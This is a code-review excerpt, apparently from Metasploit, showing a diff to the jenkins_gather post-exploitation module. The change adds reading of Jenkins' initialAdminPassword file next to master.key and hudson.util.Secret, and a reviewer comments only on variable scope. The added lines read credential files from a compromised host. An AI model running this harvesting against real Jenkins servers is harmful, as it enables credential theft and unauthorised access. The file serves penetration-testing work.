modules/post/multi/gather/jenkins_gather.rb

```diff
@@ -296,9 +298,22 @@ def get_key_material(home, platform)
     when 'windows'
       master_key_path = "#{home}\\secrets\\master.key"
       hudson_secret_key_path = "#{home}\\secrets\\hudson.util.Secret"
+      initial_admin_password_path = "#{home}\\secrets\\initialAdminPassword"
     when 'nix'
       master_key_path = "#{home}/secrets/master.key"
       hudson_secret_key_path = "#{home}/secrets/hudson.util.Secret"
+      initial_admin_password_path = "#{home}/secrets/initialAdminPassword"
+    end
+
+    # Newer versions of Jenkins have an `initialAdminPassword` which contains the initial password set when configuring Jenkins
+    # tested on versions 2.401.1, 2.346.3, 2.103
+    if exists?(initial_admin_password_path)
+      @initial_admin_password = read_file(initial_admin_password_path)
```

Comment:
```suggestion
      initial_admin_password = read_file(initial_admin_password_path)
```
I don't think this needs to be an instance variable if it's not being used outside of this function